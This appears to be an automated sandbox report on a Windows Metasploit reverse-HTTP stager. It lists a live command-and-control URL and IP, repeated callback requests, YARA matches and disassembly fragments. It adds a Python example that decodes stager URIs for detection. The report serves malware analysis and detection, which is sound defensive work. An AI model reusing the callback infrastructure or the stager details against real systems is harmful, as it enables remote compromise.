Source: DRVf7H9j4V.exe |
Malware Configuration Extractor: Metasploit {"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"} |
Source: DRVf7H9j4V.exe |
ReversingLabs: Detection: 81% |
Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: DRVf7H9j4V.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: DRVf7H9j4V.exe |
Binary string (PDB path): C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then xor edx, dword ptr [90909090h] |
0_2_0040A430 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then push ebp |
0_2_00401E39 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_004056C0 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then enter FAFFh, 90h |
0_2_004066E0 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_004056F0 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then or dword ptr [ebx+104D8BECh], 8B08456Dh |
0_2_00408680 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then xchg dword ptr [eax+21909081h], edx |
0_2_004058A1 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_004056B1 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then sti |
0_2_0040566F |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then enter FAFFh, 90h |
0_2_004067C3 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 4x nop then xchg dword ptr [eax+21909081h], edx |
0_2_004059A4 |
Source: Malware configuration extractor |
URLs: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF |
Source: unknown |
Network traffic detected: HTTP traffic on ports 49704, 49705, 49706, 49713, 49714, 49715, 49716, 63653, 63654, 63655 -> 7700 |
Source: global traffic |
TCP traffic: 192.168.2.8:49704 -> 89.197.154.115:7700 |
Source: Joe Sandbox View |
IP Address: 89.197.154.115 |
Source: Joe Sandbox View |
ASN Name: VIRTUAL1GB |
Source: global traffic |
HTTP traffic detected (10 identical requests):
GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Host: 89.197.154.115:7700
Connection: Keep-Alive
Cache-Control: no-cache |
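The URI in the requests above is not random padding. Metasploit's reverse_http stagers request a URI whose 8-bit checksum (sum of the bytes mod 256) tells the handler which mode to serve, and whose first 22 base64url characters carry a 16-byte payload UUID encoding the platform, the architecture and the time the payload was generated. The Python below is an added example written for this page, not code from the Joe Sandbox report or from Metasploit; the checksum constants and the UUID byte layout are assumed from metasploit-framework's lib/rex/payloads/meterpreter/uri_checksum.rb and lib/msf/core/payload/uuid.rb, the platform and architecture tables are partial, and the proxy-log lines fed to flag_stager_requests are constructed for the demonstration (only the first reproduces the request seen in the sandbox). The ab.pdb path and the OriginalFilename ab.exe elsewhere in this report are consistent with msfvenom's default 32-bit Windows executable template, which is built from Apache Bench.

```python
"""Added example for this page (not from the Joe Sandbox report or Metasploit):
decode a Metasploit reverse_http stager URI and scan request lines for them.

Assumptions (taken from the metasploit-framework source, not from this report):
  * handler mode = Rex::Text.checksum8(uri) = sum of bytes mod 256
    (lib/rex/payloads/meterpreter/uri_checksum.rb);
  * the first 22 base64url chars are a 16-byte Msf::Payload::UUID:
    8-byte PUID, xor1, xor2, platform^xor1, arch^xor2,
    timestamp ^ (xor1 xor2 xor1 xor2) (lib/msf/core/payload/uuid.rb).
"""
import base64
import re
from datetime import datetime, timezone

# Metasploit URI_CHECKSUM_* constants -> handler mode.
URI_CHECKSUM_MODES = {
    92: "init_native",   # URI_CHECKSUM_INITW / INITN (Windows and other native stagers)
    80: "init_python",   # URI_CHECKSUM_INITP
    88: "init_java",     # URI_CHECKSUM_INITJ
    98: "connect",       # URI_CHECKSUM_CONN (existing session)
    95: "init_connect",  # URI_CHECKSUM_INIT_CONN
}
# Partial Msf::Payload::UUID platform / architecture tables (assumption: common IDs only).
PLATFORMS = {1: "windows", 3: "android", 4: "java", 6: "linux", 9: "osx", 21: "python"}
ARCHS = {1: "x86", 2: "x64", 3: "x64", 12: "armle", 24: "aarch64"}

# The URI requested from 89.197.154.115:7700 in the sandbox run (copied from the report).
OBSERVED_URI = (
    "K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-"
    "kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"
)

BASE64URL_JUNK = re.compile(r"[^A-Za-z0-9_\-]")


def checksum8(text: str) -> int:
    """Rex::Text.checksum8: sum of the byte values modulo 256."""
    return sum(text.encode("ascii")) % 256


def uri_mode(uri: str):
    """Drop non-base64url characters as the handler does, then map checksum8 to a mode."""
    return URI_CHECKSUM_MODES.get(checksum8(BASE64URL_JUNK.sub("", uri)))


def decode_payload_uuid(uri: str) -> dict:
    """Recover PUID, platform, architecture and generation time from the URI prefix."""
    bare = BASE64URL_JUNK.sub("", uri)
    if len(bare) < 22:
        raise ValueError("URI too short to carry a payload UUID")
    raw = base64.urlsafe_b64decode(bare[:22] + "==")  # 22 chars -> 16 bytes
    plat_xor, arch_xor, plat_masked, arch_masked = raw[8], raw[9], raw[10], raw[11]
    # The timestamp mask recycles the two XOR bytes: xor1 xor2 xor1 xor2.
    time_xor = int.from_bytes(bytes([plat_xor, arch_xor, plat_xor, arch_xor]), "big")
    timestamp = int.from_bytes(raw[12:16], "big") ^ time_xor
    plat_id, arch_id = plat_xor ^ plat_masked, arch_xor ^ arch_masked
    return {
        "puid": raw[:8].hex(),
        "platform": PLATFORMS.get(plat_id, f"unknown({plat_id})"),
        "arch": ARCHS.get(arch_id, f"unknown({arch_id})"),
        "timestamp": timestamp,
        "created_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
    }


def flag_stager_requests(lines, min_len=22):
    """Return (line, mode, uuid_info) for request lines whose path checksums to a
    Metasploit mode and is long enough to carry a UUID.  checksum8 alone matches
    about 5 in 256 arbitrary paths, hence the length gate; add a timestamp
    plausibility check before alerting on production traffic."""
    hits = []
    for line in lines:
        if "://" not in line or line.count("/") < 3:
            continue
        path = line.split("/", 3)[3]            # everything after host[:port]/
        bare = BASE64URL_JUNK.sub("", path)
        mode = URI_CHECKSUM_MODES.get(checksum8(bare))
        if mode and len(bare) >= min_len:
            hits.append((line, mode, decode_payload_uuid(bare)))
    return hits


# Constructed proxy-log lines: the first reproduces the sandbox request, the rest are benign.
SAMPLE_LOG = [
    "GET http://89.197.154.115:7700/" + OBSERVED_URI,
    "GET http://example.com/index.html",
    "GET http://cdn.example.net/assets/app.min.js?v=12345",
]

if __name__ == "__main__":
    print("checksum8:", checksum8(OBSERVED_URI), "mode:", uri_mode(OBSERVED_URI))
    print("uuid:", decode_payload_uuid(OBSERVED_URI))
    for line, mode, info in flag_stager_requests(SAMPLE_LOG):
        print("FLAGGED", mode, info["platform"], info["arch"], info["created_utc"], line[:60])
```

For the observed URI the checksum is 92 (init_native, the Windows stager mode) and the UUID decodes to platform windows, arch x86, generated on 2024-09-27 UTC, which agrees with the 32-bit PE in this report. The checksum test by itself is weak evidence, so detection logic should key on the combination seen here: a checksum-conforming path of stager length, a direct-to-IP Host header on a non-standard port, no preceding DNS query, and the same GET repeated at short intervals.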
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.197.154.115 (50 connections, none preceded by a DNS lookup) |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kq |
Source: DRVf7H9j4V.exe |
String found in binary or memory: http://www.apache.org/ |
Source: DRVf7H9j4V.exe |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: DRVf7H9j4V.exe |
String found in binary or memory: http://www.zeustech.net/ |
Source: DRVf7H9j4V.exe (type: SAMPLE); 0.0.DRVf7H9j4V.exe.400000.0.unpack (type: UNPACKEDPE); 0.2.DRVf7H9j4V.exe.400000.0.unpack (type: UNPACKEDPE); 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp (type: MEMORY); 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp (type: MEMORY); 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp (type: MEMORY) |
Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_0040162C |
0_2_0040162C |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00690095 |
0_2_00690095 |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename ab.exe vs DRVf7H9j4V.exe |
Source: DRVf7H9j4V.exe |
Binary or memory string: OriginalFilename ab.exe vs DRVf7H9j4V.exe |
Source: DRVf7H9j4V.exe (type: SAMPLE); 0.0.DRVf7H9j4V.exe.400000.0.unpack (type: UNPACKEDPE); 0.2.DRVf7H9j4V.exe.400000.0.unpack (type: UNPACKEDPE); 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp (type: MEMORY); 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp (type: MEMORY); 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp (type: MEMORY) |
Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23 |
Source: DRVf7H9j4V.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: classification engine |
Classification label: mal100.troj.winEXE@1/0@0/1 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Sections loaded: apphelp.dll, wsock32.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 |
Source: DRVf7H9j4V.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00401877 pushad ; retf |
0_2_00401A79 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004070D9 push ebx; iretd |
0_2_004070DD |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004012DB push FFFFFFCAh; ret |
0_2_00401308 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00402779 push ebp; ret |
0_2_0040277A |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00405123 push edi; retn 0010h |
0_2_00405125 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00401527 push esi; ret |
0_2_00401528 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004055C6 push edx; ret |
0_2_004055C9 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004017D1 pushad ; retf |
0_2_00401A79 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004079EC push eax; retf |
0_2_004079ED |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00401DFC push 00401450h; iretd |
0_2_00401E0A |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_00403F92 push ebp; ret |
0_2_00403F9A |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe |
Code function: 0_2_004017BC pushad ; retf |
0_2_00401A79 |
Source: DRVf7H9j4V.exe |
Static PE information: section name: .text entropy: 7.017108244459124 |
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe TID: 6108 |
Thread sleep time: -45000s >= -30000s |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.0000000000777000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW0 |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%%,b |
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Yara match |
File sources: DRVf7H9j4V.exe (type: SAMPLE); 0.0.DRVf7H9j4V.exe.400000.0.unpack (type: UNPACKEDPE); 0.2.DRVf7H9j4V.exe.400000.0.unpack (type: UNPACKEDPE); 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp (type: MEMORY); 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp (type: MEMORY); 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp (type: MEMORY) |